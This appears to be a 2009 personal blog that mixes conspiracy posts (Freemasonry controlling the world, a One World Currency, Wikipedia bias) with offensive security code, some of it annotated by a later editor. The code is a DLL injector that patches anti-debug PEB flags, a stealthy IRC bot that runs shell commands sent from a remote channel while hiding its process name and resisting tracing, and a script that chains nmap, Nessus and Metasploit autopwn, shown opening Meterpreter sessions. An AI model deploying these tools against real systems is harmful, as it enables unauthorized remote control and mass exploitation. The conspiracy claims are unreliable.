Write down on a piece of paper all the things that you own. Next, for each item ask yourself, "Did I design and manufacture this item?" A majority of things within your home you purchased and have no knowledge of how they were designed or built. "The Custodians [God] clearly did not want mankind to begin traveling the road to spiritual recovery." PP 48. One sure way is to keep knowledge away from the human race. The information they do not want you to learn however is not of the technological kind, it is The Forbidden Knowledge. Methods used to control an entire world and to keep the personalities who live in that world spiritually ignorant and unaware of the prison system they are caught in. Did you learn anything about Freemasonry's dominant presence on earth in grade school?

The bible says Satan is a destroyer, it also says in II Corinthians 4 that he controls earth. This should be of no surprise to you with what you just learned because it coincides with modern day observations.

The social system you live within lies to you. It conditions your mind to think that you are the most advanced human earth has ever seen when in fact, the reverse is true. You are dependent on it for all your basic needs. Everything is already prepared for you. Your clothes come from department stores, your food comes from grocery stores, and your home was most likely not designed and built by you either. Do you think that is progress? The bottom line is, you can use technology but you cannot design and build your own unless you have a lot of money and who controls the money? Freemasonry.

The Custodial-designed societal system includes an education sub system that produces robots, people who all think the same way and an employment sub system which furthers that robotic behavior. This makes it easier for them to control the people because a robot never questions authority and does what everyone else does. Bramley's book reveals that Satan traded places with God in Eden and fooled the human race. Modern day observations prove this."

http://www.theforbiddenknowledge.com/godsofeden/index.htm


 
posted by c0ntex at 1:03 PM | Permalink | 0 comments
Switcheroo
This is an old post that got removed somehow - Added back.

I love media propaganda, it is really cool. A fast, cost-effective way to use suggestive techniques to massage and manipulate the society it serves by implanting ideas, feelings, emotions and realities into people's minds.

The worst part though is that this happens WITHOUT any form of resistance! Since the victim is self inducing themselves by willingly buying and reading the newspapers, magazines, TV licenses, etc.... Very clever.

What is cooler though, is being able to see it for what it is. And thank God I am able to understand what is going on. :)

Anyway, I saw this report in The Independent, which is a reasonable paper in the UK, not great but it's ok. Anyway, today it is discussing another pop star insisting on being paid in Euros

http://news.independent.co.uk/world/americas/article3169653.ece

as opposed to ever-declining Dollars. This might seem trivial at first glance, but coupled with the media coverage last month of a model who asked the same, it is clear the media (foreign and domestic) want to push the thought that the Euro is the new cool item.

http://youtube.com/watch?v=wiuNd5SoU8E

Jay-Z used to drop some decent tunes, but obviously not anymore, as you see from that video, but you certainly see Euros as his "bread" numerous times. Maybe a wild coincidence....

"Look all the famous, cool people in the world are using it, shouldn't you, don't you want to be cool too?!" is what the media is shouting out!!

So, this goes back to the discussion about a One World Government and a One World Currency

Check out: http://video.google.co.uk/videoplay?docid=-448659287463550973

The Dollar isn't here to stay, I think that is clear - but will a second push for the Pound Sterling and UK to adopt the Euro again by "British Government" happen too? Interesting.


 
posted by c0ntex at 1:00 PM | Permalink | 0 comments
Saturday, July 11, 2009
I was dead



I was dead, in the seas of error and sin, drowned.
I was a slave in the shackles of sin, owned, fettered.
The Shaytan passed his rope down to me from his many ways.
Sins, I would go to them sunset and sunrise,

The sins attacked my skin then bones... then veins.
I was enrolled in the glitter of the star of this world.
Truly, I am in need of rain, purifying, able to clean.
 
posted by c0ntex at 3:29 AM | Permalink | 0 comments
Thursday, July 09, 2009
Wikidpedia
I do not like Wikipedia; its information in many cases is extremely biased and inaccurate, they are unwilling to promote facts, yet unfortunately they are seen as the most authoritative figure in inter-fact.

If you don't believe me, google for things like "wikipedia inaccuracies", "wikipedia biased", "wikipedia inaccurate" or any other likely keywords and wake up!

Just who is editing and managing wiki articles?

"if Wikipedia is "history", then history is indeed bunk" - Petronella Wayte.

Rather than Wikidpedia, I prefer this cool site, which seems to promote a more accurate version of current information and historical record based on fact. Better job.

http://www.conservapedia.com/Main_Page


 
posted by c0ntex at 11:10 AM | Permalink | 2 comments
Tuesday, June 30, 2009
Obama - What is the truth??
Webster Tarpley has released a new book called "Obama, The Unauthorised Biography".

If you do not know who Webster Tarpley is, here is a link to his site: http://www.tarpley.net

#### Part One



#### Part Two



Anyway, after all that, now the last video - this is an interesting view, please enjoy it and leave a comment :)



 
posted by c0ntex at 11:33 PM | Permalink | 0 comments
Sunday, June 21, 2009
DLL Injection
I wrote a little DLL injector to switch off IsBeingDebugged and reset the NtGlobalFlags entries in the process's PEB. Pointless really, since there are numerous OllyDBG / IDA plugins to do it, but I had some free time.

Final version as always can be found at open-security.org or nodefense.org


/*
dll_inject.c
Injects isdebugged.dll to switch off IsDebugged flag in PEB structure.
*/
/* The include names were lost on the blog; these are the headers the code needs. */
#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char * argv[])
{
    char * mydll = "isdebugged.dll";
    DWORD procID = 0;
    HANDLE Proc = NULL, hThread = NULL;
    HWND targetWnd;
    LPVOID VaMemSpace, MyLibLoad;
    LPCWSTR windowName = L"Command Prompt";

    /* The target is found by window title; the DLL goes into whichever
       process owns that window */
    targetWnd = FindWindowW(
        NULL,
        windowName);
    if(targetWnd == NULL) {
        printf("FindWindow error: %lu\n", GetLastError());
        return 1;
    }

    if(!GetWindowThreadProcessId(
        targetWnd,
        &procID)) {
        printf("GetWindowThreadProcessId error: %lu\n", GetLastError());
        return 1;
    }

    if(!procID) {
        return 1;
    }

    printf("Got process ID [%lu]\n", procID);

    Proc = OpenProcess(
        PROCESS_CREATE_THREAD|SYNCHRONIZE|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,
        FALSE,
        procID);
    if(Proc == NULL) {
        printf("OpenProcess error: %lu\n", GetLastError());
        return 1;
    }

    /* kernel32.dll sits at the same base in every process of the same bitness,
       so the local LoadLibraryA address is valid as the remote thread's start */
    MyLibLoad = (LPVOID)GetProcAddress(
        GetModuleHandleW(
            L"kernel32.dll"),
        "LoadLibraryA");
    if(MyLibLoad == NULL) {
        printf("GetProcAddress error: %lu\n", GetLastError());
        CloseHandle(Proc);
        return 1;
    }

    /* +1 so the NUL terminator is copied too; the original passed strlen() */
    VaMemSpace = VirtualAllocEx(
        Proc,
        NULL,
        strlen(mydll) + 1,
        MEM_COMMIT|MEM_RESERVE,
        PAGE_READWRITE);
    if(VaMemSpace == NULL) {
        printf("VirtualAlloc error: %lu\n", GetLastError());
        CloseHandle(Proc);
        return 1;
    }

    /* The original compared the function pointer to 0 instead of the return value */
    if(!WriteProcessMemory(
        Proc,
        VaMemSpace,
        mydll,
        strlen(mydll) + 1,
        NULL)) {
        printf("WriteProcessMemory error: %lu\n", GetLastError());
        CloseHandle(Proc);
        return 1;
    }

    hThread = CreateRemoteThread(
        Proc,
        NULL,
        0,
        (LPTHREAD_START_ROUTINE)MyLibLoad,
        VaMemSpace,
        0,
        NULL);
    if(hThread == NULL) {
        printf("CreateRemoteThread error: %lu\n", GetLastError());
        CloseHandle(Proc);
        return 1;
    }

    printf("Created the new thread!\n");

    /* Let LoadLibraryA finish before the buffer holding the DLL name is freed
       (the original freed it immediately and closed a handle it never set) */
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);

    /* MEM_RELEASE requires a size of 0; the original passed sizeof(mydll) */
    if(!VirtualFreeEx(
        Proc,
        VaMemSpace,
        0,
        MEM_RELEASE)) {
        printf("VirtualFreeEx error: %lu\n", GetLastError());
        CloseHandle(Proc);
        return 1;
    }

    CloseHandle(Proc);
    return 0;
}



/*
isdebugged.dll

Resets the PEB's BeingDebugged byte
Resets the PEB's NtGlobalFlag field

32-bit only: the TEB is reached through fs:[0x18] and the PEB pointer sits at
TEB+0x30, which is the x86 layout (on x64 the PEB pointer is at gs:[0x60]).
*/

#include <windows.h>
#include <stdio.h>

__declspec(dllexport) void SetINT(void)
{
    printf("Setting INT 3 trap\n");
    _asm
    {
        int 3
    }
}

__declspec(dllexport) void SetDebugFlag(void)
{
    printf("Resetting PEB's BeingDebugged entry\n");
    _asm
    {
        mov eax, dword ptr fs:[0x18]        ; TEB
        mov eax, dword ptr ds:[eax+0x30]    ; TEB->ProcessEnvironmentBlock
        mov byte ptr ds:[eax+0x2], 0x0      ; PEB->BeingDebugged = 0 (what IsDebuggerPresent reads)
    }
    printf("Resetting PEB's NtGlobalFlag entry\n");
    _asm
    {
        mov eax, dword ptr fs:[0x18]
        mov eax, dword ptr ds:[eax+0x30]
        mov dword ptr ds:[eax+0x68], 0x0    ; PEB->NtGlobalFlag = 0, the whole DWORD not just its low byte
    }
    printf("Done modifying PEB\n");
}

/* Standard DllMain signature; the extra argc/argv parameters in the original
   do not exist for a DLL entry point. */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch(ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs inside the injected process, under the loader lock, as soon as
           the remote LoadLibraryA maps us. printf only shows if the host has a console. */
        printf("Entering the process... Weee!\n");
        SetDebugFlag();
        break;

    case DLL_PROCESS_DETACH:
        printf("Leaving the process... Poof!\n");
        break;
    }
    return TRUE;
}
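Added example, not code from the original post: a plain-C model of the two PEB fields the DLL zeroes, next to the check a debugger-aware target makes on them. The struct is the 32-bit PEB layout up to NtGlobalFlag written with fixed-width fields, so the offsets the inline asm hard-codes (BeingDebugged at 0x02, NtGlobalFlag at 0x68) hold on any host and can be verified with offsetof. The 0x70 mask is the three heap flags the system sets in NtGlobalFlag when a process is created under a debugger (not when one attaches later), which is why a target that looks there survives a later IsDebuggerPresent patch. The sample PEB contents are constructed; the `peb32_current()` helper is only compiled for 32-bit MSVC builds.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 32-bit PEB, first 0x6C bytes, with pointers as uint32_t so the layout
   does not depend on the host's pointer size. */
struct peb32 {
    uint8_t  InheritedAddressSpace;      /* 0x00 */
    uint8_t  ReadImageFileExecOptions;   /* 0x01 */
    uint8_t  BeingDebugged;              /* 0x02: what IsDebuggerPresent() returns */
    uint8_t  BitField;                   /* 0x03 */
    uint32_t Mutant;                     /* 0x04 */
    uint32_t ImageBaseAddress;           /* 0x08 */
    uint32_t Ldr;                        /* 0x0C */
    uint32_t ProcessParameters;          /* 0x10 */
    uint32_t SubSystemData;              /* 0x14 */
    uint32_t ProcessHeap;                /* 0x18 */
    uint32_t FastPebLock;                /* 0x1C */
    uint32_t AtlThunkSListPtr;           /* 0x20 */
    uint32_t IFEOKey;                    /* 0x24 */
    uint32_t CrossProcessFlags;          /* 0x28 */
    uint32_t KernelCallbackTable;        /* 0x2C */
    uint32_t SystemReserved;             /* 0x30 */
    uint32_t AtlThunkSListPtr32;         /* 0x34 */
    uint32_t ApiSetMap;                  /* 0x38 */
    uint32_t TlsExpansionCounter;        /* 0x3C */
    uint32_t TlsBitmap;                  /* 0x40 */
    uint32_t TlsBitmapBits[2];           /* 0x44 */
    uint32_t ReadOnlySharedMemoryBase;   /* 0x4C */
    uint32_t SharedData;                 /* 0x50 */
    uint32_t ReadOnlyStaticServerData;   /* 0x54 */
    uint32_t AnsiCodePageData;           /* 0x58 */
    uint32_t OemCodePageData;            /* 0x5C */
    uint32_t UnicodeCaseTableData;       /* 0x60 */
    uint32_t NumberOfProcessors;         /* 0x64 */
    uint32_t NtGlobalFlag;               /* 0x68: the field the DLL's second asm block zeroes */
};

/* FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS,
   set by the system when the process is started under a debugger. */
#define NTGLOBALFLAG_DEBUGGER_MASK 0x70u

/* Confirms the model matches the offsets hard-coded in the DLL's inline asm. */
int peb32_offsets_ok(void)
{
    return offsetof(struct peb32, BeingDebugged) == 0x02 &&
           offsetof(struct peb32, NtGlobalFlag) == 0x68;
}

/* The check an anti-debug target typically makes: either field gives it away. */
int peb32_is_debugged(const struct peb32 *peb)
{
    return peb->BeingDebugged != 0 ||
           (peb->NtGlobalFlag & NTGLOBALFLAG_DEBUGGER_MASK) != 0;
}

/* What SetDebugFlag() does, on the struct. The DLL zeroes all of NtGlobalFlag;
   here only the debugger-set bits go, so unrelated flags survive.
   Returns how many fields were changed. */
int peb32_clear_debug_flags(struct peb32 *peb)
{
    int changed = 0;
    if (peb->BeingDebugged) { peb->BeingDebugged = 0; changed++; }
    if (peb->NtGlobalFlag & NTGLOBALFLAG_DEBUGGER_MASK) {
        peb->NtGlobalFlag &= ~NTGLOBALFLAG_DEBUGGER_MASK;
        changed++;
    }
    return changed;
}

/* Constructed sample: what the PEB of a process launched from a debugger looks like. */
struct peb32 peb32_debugged_sample(void)
{
    struct peb32 peb;
    memset(&peb, 0, sizeof peb);
    peb.BeingDebugged = 1;
    peb.NtGlobalFlag = NTGLOBALFLAG_DEBUGGER_MASK;
    return peb;
}

#if defined(_MSC_VER) && defined(_M_IX86)
#include <intrin.h>
/* On 32-bit Windows fs: is the TEB and TEB+0x30 is the PEB pointer. */
struct peb32 *peb32_current(void) { return (struct peb32 *)__readfsdword(0x30); }
#endif

int main(void)
{
    struct peb32 peb = peb32_debugged_sample();
    printf("offsets ok: %d\n", peb32_offsets_ok());
    printf("before: debugged=%d\n", peb32_is_debugged(&peb));
    printf("cleared %d field(s)\n", peb32_clear_debug_flags(&peb));
    printf("after:  debugged=%d\n", peb32_is_debugged(&peb));
    return 0;
}
```

Both fields matter: a debugger attached after start leaves NtGlobalFlag alone, while a process created from the debugger has the 0x70 bits set even after BeingDebugged is patched, so a target checking NtGlobalFlag still notices unless the second write happens too.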

posted by c0ntex at 12:04 AM | Permalink | 0 comments
Friday, June 19, 2009
RuxxBot
/*
 * An SSL IRC bot that will run some commands on teh hoster, useful for running
 * john on your linux box via irc during a pentest - cheap man's VPN ;)
 *
 * Has a couple of little bugs which I might fix, but it serves its simple purpose.
 *
 * You should change the stuff in SSLTYPE1 & SSLTYPE2 to match your own box, I
 * just added that as a test to see if it would tell if a MITM was present.
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

#define OWNER "x0ng@i.r.steppin.down"
#define NICK "ruxxbot"
#define USER "ruxxbot"
#define CHAN "home"
#define SERV "nodefense.org"
#define PASS "" //channel password
#define PORT 65531

#define LABEL "t3hrUxx0r"
#define SSLTYPE1 "AES256-SHA"   /* expected cipher name */
#define SSLTYPE2 "TLSv1/SSLv3"  /* what SSL_get_cipher_version() reports for that cipher on the OpenSSL of the day */
#define BSIZE 80
#define RBUF 4096


SSL_CTX *
initctx(void)
{
    const SSL_METHOD *method;
    SSL_CTX *ctx;

    SSL_library_init();
    OpenSSL_add_all_algorithms();

    method = SSLv23_client_method();
    ctx = SSL_CTX_new(method);
    if(!ctx)
        exit(1);

    return ctx;
}


void
srvsend(SSL *ssl, const char *msg)
{
    if(SSL_write(ssl, msg, strlen(msg)) < 1)
        exit(1);
}


/* Reads one chunk from the server and answers PINGs. Returns a pointer to a
 * static buffer: the original returned the address of a local array, which is
 * gone by the time the caller looks at it. */
char *
srvread(SSL *ssl)
{
    static char buf[RBUF];
    char msgbuf[BSIZE];
    int bytes;

    memset(buf, 0, sizeof(buf));
    bytes = SSL_read(ssl, buf, sizeof(buf)-1);
    if(bytes <= 0)              /* 0 is EOF, negative is an error */
        exit(1);
    buf[bytes] = '\0';

    if(strstr(buf, "PING")) {
        sleep(2);
        snprintf(msgbuf, sizeof(msgbuf), "PONG :%s\r\n", SERV);
        srvsend(ssl, msgbuf);
    }

    return buf;
}


/* Runs whatever follows "!e " through the shell and sends each output line
 * back to the channel. */
void
runcmd(SSL *ssl, char *cmdptr)
{
    char buf[256];
    char cmdbuf[2048];
    char *cmd;
    FILE *sys;

    if((strlen(cmdptr) > 256) || (strlen(cmdptr) < 1))
        return;

    /* The original used strchr() with the multi-character constant '!e ',
     * which can never match the trigger; strstr() is what was meant. */
    cmd = strstr(cmdptr, "!e ");
    if(!cmd)
        return;
    cmd += 3;                          /* skip the "!e " trigger itself */

    cmd[strcspn(cmd, "\r\n")] = '\0';  /* strip the IRC line terminator */
    if(!*cmd)
        return;

    sys = popen(cmd, "r");
    if(!sys)
        return;

    while(fgets(buf, sizeof(buf), sys)) {
        buf[strcspn(buf, "\r\n")] = '\0';
        snprintf(cmdbuf, sizeof(cmdbuf), "PRIVMSG #%s :%s\r\n", CHAN, buf);
        srvsend(ssl, cmdbuf);
    }

    pclose(sys);
}


void
op(SSL *ssl)
{
    char opbuf[BSIZE];

    snprintf(opbuf, sizeof(opbuf), "MODE #%s +o x0ng\r\n", CHAN);
    srvsend(ssl, opbuf);
}


void
srvconn(SSL *ssl)
{
    char *cmd;
    char *cmdptr;
    char msgbuf[BSIZE];

    struct set
    {
        const char *chan;
        const char *pass;
        const char *user;
        const char *nick;
    } irc;

    irc.chan = CHAN;
    irc.user = USER;
    irc.nick = NICK;
    irc.pass = PASS;

    /* The original joined these with &&, so it only bailed when all four were too long. */
    if(strlen(irc.chan) > 15 || strlen(irc.pass) > 15 || strlen(irc.user) > 15 || strlen(irc.nick) > 15)
        exit(1);

    snprintf(msgbuf, sizeof(msgbuf), "NICK %s\r\n", irc.nick);
    srvsend(ssl, msgbuf);

    snprintf(msgbuf, sizeof(msgbuf), "USER %s %s %s :%s\r\n", irc.user, irc.user, irc.user, irc.user);
    srvsend(ssl, msgbuf);

    snprintf(msgbuf, sizeof(msgbuf), "JOIN #%s %s\r\n", irc.chan, irc.pass);
    srvsend(ssl, msgbuf);

    for(;;) {
        cmd = srvread(ssl);
        //printf("\n%s\n", cmd); // Debug
        if(strstr(cmd, OWNER)) {
            if(strstr(cmd, "!op"))
                op(ssl);
            if((cmdptr = strstr(cmd, "!e ")))
                runcmd(ssl, cmdptr);
        }
    }
}


/* Returns 1 when the negotiated cipher is the expected one, 0 otherwise.
 * The original returned -1 on mismatch and main() tested it with if(), so
 * the check could never fail. */
int
srvssl(SSL *ssl)
{
    if((!strstr(SSL_get_cipher_name(ssl), SSLTYPE1)) || (!strstr(SSL_get_cipher_version(ssl), SSLTYPE2)))
        return 0;
    return 1;
}


int
main(int argc, char * argv[])
{
    int sock, port = PORT;
    size_t alen;
    struct sockaddr_in sout;
    struct hostent *he;
    SSL_CTX *ctx;
    SSL *ssl;
    pid_t pid;

    /* Fails if a tracer (gdb, strace) is already attached. */
    if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1)
        exit(1);

    /* Overwrite the name shown in ps, staying within argv[0]'s own length. */
    alen = strlen(argv[0]);
    memset(argv[0], 0, alen);
    strncpy(argv[0], LABEL, alen);

    he = gethostbyname(SERV);
    if(!he)
        exit(1);

    memset(&sout, 0, sizeof(sout));
    sout.sin_family = AF_INET;
    sout.sin_port = htons(port);
    memcpy(&sout.sin_addr.s_addr, he->h_addr, he->h_length);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0)
        exit(1);

    ctx = initctx();
    ssl = SSL_new(ctx);
    if(!ssl)
        exit(1);

    /* The child does the work so the shell prompt comes straight back. */
    pid = fork();
    if(pid < 0)
        exit(1);

    if(pid == 0) {
        if(connect(sock, (struct sockaddr *)&sout, sizeof(sout)) < 0)
            exit(1);

        SSL_set_fd(ssl, sock);
        if(SSL_connect(ssl) != 1)
            exit(1);

        if(srvssl(ssl))
            srvconn(ssl);
        exit(1);
    }

    close(sock);
    SSL_free(ssl);
    SSL_CTX_free(ctx);

    return 0;
}
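Added example, not part of RuxxBot: the bot decides who may run `!e` with `strstr(cmd, OWNER)` over the raw read, which matches the owner's hostmask wherever it appears in the line, so anyone in the channel who pastes that string in front of `!e id` passes the check. The parser here splits an IRC line into prefix, command, target and trailing text and only honours `!e` when the `user@host` part of the server-supplied prefix is exactly OWNER. The bot's own check is included for comparison; the two sample lines are constructed, and the OWNER value is the one from the bot.

```c
#include <stdio.h>
#include <string.h>

#define OWNER "x0ng@i.r.steppin.down"   /* user@host part of the owner's hostmask, as in the bot */

struct ircmsg {
    char prefix[128];   /* nick!user@host, filled in by the server, not by the sender */
    char command[32];   /* PRIVMSG, NOTICE, ... */
    char target[64];    /* #channel or nick */
    char text[512];     /* trailing parameter */
};

/* Parse a ":prefix COMMAND target :text\r\n" line. Only that shape is
   handled, which is all the command path needs. Returns 1 on success,
   0 if the line is malformed or a field is too long. */
int irc_parse_msg(const char *line, struct ircmsg *m)
{
    const char *p = line, *sp;
    size_t n;

    memset(m, 0, sizeof *m);

    if (*p == ':') {                          /* optional prefix */
        p++;
        if (!(sp = strchr(p, ' '))) return 0;
        n = (size_t)(sp - p);
        if (n == 0 || n >= sizeof m->prefix) return 0;
        memcpy(m->prefix, p, n);
        p = sp + 1;
    }

    if (!(sp = strchr(p, ' '))) return 0;     /* command */
    n = (size_t)(sp - p);
    if (n == 0 || n >= sizeof m->command) return 0;
    memcpy(m->command, p, n);
    p = sp + 1;

    if (!(sp = strchr(p, ' '))) return 0;     /* first parameter: the target */
    n = (size_t)(sp - p);
    if (n == 0 || n >= sizeof m->target) return 0;
    memcpy(m->target, p, n);
    p = sp + 1;

    if (*p != ':') return 0;                  /* trailing text */
    p++;
    n = strcspn(p, "\r\n");
    if (n >= sizeof m->text) return 0;
    memcpy(m->text, p, n);
    return 1;
}

/* The bot's check, for comparison: true if both strings occur anywhere. */
int ruxxbot_style_check(const char *line)
{
    return strstr(line, OWNER) != NULL && strstr(line, "!e") != NULL;
}

/* Returns the command to run, or NULL unless this is a PRIVMSG whose sender's
   user@host is exactly OWNER and whose text starts with "!e ". */
const char *irc_authorised_command(const struct ircmsg *m)
{
    const char *bang = strchr(m->prefix, '!');

    if (strcmp(m->command, "PRIVMSG") != 0) return NULL;
    if (bang == NULL || strcmp(bang + 1, OWNER) != 0) return NULL;
    if (strncmp(m->text, "!e ", 3) != 0) return NULL;
    return m->text + 3;
}

int main(void)
{
    /* constructed: a genuine owner command, then an impostor quoting the owner's mask */
    const char *lines[] = {
        ":x0ng!x0ng@i.r.steppin.down PRIVMSG #home :!e id\r\n",
        ":mallory!evil@example.net PRIVMSG #home :x0ng@i.r.steppin.down !e id\r\n",
    };
    size_t i;
    struct ircmsg m;

    for (i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        const char *cmd = irc_parse_msg(lines[i], &m) ? irc_authorised_command(&m) : NULL;
        printf("bot check: %d  prefix check: %s\n",
               ruxxbot_style_check(lines[i]), cmd ? cmd : "(rejected)");
    }
    return 0;
}
```

The prefix is worth trusting only as far as the server is: it is what the IRCd saw for that connection, which is why this belongs with verifying the server certificate rather than the cipher name in `srvssl()`; an interceptor can offer AES256-SHA just as well as the real server, so the cipher check does not tell a MITM apart.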

posted by c0ntex at 11:12 PM | Permalink | 0 comments
AutoSploit PwnMatic
This script runs nmap against a box or network to find live hosts, scans those with Nessus, imports the results into Metasploit and then runs autopwn only against the exploits matched to the vulnerability IDs Nessus reported. That is more efficient than the default autopwn method of throwing every exploit at every open port, and it avoids owning the same breed of bug several times over.

Just run it, go for a coffee and come back to get your r00t on :)


#!/bin/sh
##
# Autopwn pwnmatic
# usage: pwnmatic.sh <target/network> <run-name>
##
NESSUS=~/pentest/scanners/nessus/bin #nessus binary
MSF=~/pentest/exploiting/metasploit #msf console location
LOG=~/audits/scans/nessus/$2.nbe #report location

HOSTS=./nessus_hosts.txt
AUTOPWN=./autopwn

if [ $# -ne 2 ] ; then
echo "usage: $0 <target/network> <run-name>"
exit 1
fi

echo "Starting scan..."
nmap -v -n -sP "$1" | grep Host | grep up | awk '{print $2}' > "$HOSTS"

echo "Scan finished, starting nessus..."
"$NESSUS/nessus" localhost 1337 user p4ssw0rd "$HOSTS" "$LOG"

echo "Nessus finished, converting log..."
"$NESSUS/nessus" -i "$LOG" -o "$LOG.txt"
"$NESSUS/nessus" -i "$LOG" -o "$LOG.nessus"

mv "$HOSTS" ~/audits/scans/nmap/"$2-nmap_auto.txt"

echo "Do you want to import into metasploit autopwn? (y/n)"
read DOU

if [ "$DOU" = "y" ] ; then
cat > "$AUTOPWN" << _EOF
db_create $2.db
db_import_nessus_nbe $LOG
db_autopwn -x -r -e
_EOF
echo "please wait..."
"$MSF/msfconsole" -r "$AUTOPWN"
else
echo "Listing any vulnerabilities then..."
A=`egrep "Security hole found" "$LOG.txt" | sort -u`
if [ -z "$A" ] ; then
echo " --> None found :("
else
echo "$A"
fi
echo "Finished."
fi
##
# End
##


user@debauch:~/scripts$ ./pwnmatic.sh 192.168.224.0/24 test-run
Starting scan...
Scan finished, starting nessus...
Nessus finished, converting log...
Do you want to import into metasploit autopwn? (y/n)
y
please wait...


o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


=[ msf v3.3-dev
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 158 aux

resource> db_create testing.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: testing.db
resource> db_import_nessus_nbe /home/user/audits/scans/nessus/testing.nbe
resource> db_autopwn -x -r -e
[*] (1/4): Launching exploit/windows/smb/ms04_011_lsass against 192.168.224.131:445...
[*] (2/4): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.224.131:135...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] (4/4): Launching exploit/windows/smb/ms06_040_netapi against 192.168.224.131:445...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Handler binding to LHOST 0.0.0.0
[*] Sending exploit ...
[*] Started reverse handler
msf >
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] The DCERPC service did not reply to our request
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] The DCERPC service did not reply to our request
[*] Meterpreter session 1 opened (192.168.224.129:34295 -> 192.168.224.131:1034)
[*] Meterpreter session 2 opened (192.168.224.129:23499 -> 192.168.224.131:1035)

msf > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.224.129:34295 -> 192.168.224.131:1034
2 Meterpreter 192.168.224.129:23499 -> 192.168.224.131:1035

msf >

posted by c0ntex at 8:02 PM | Permalink | 0 comments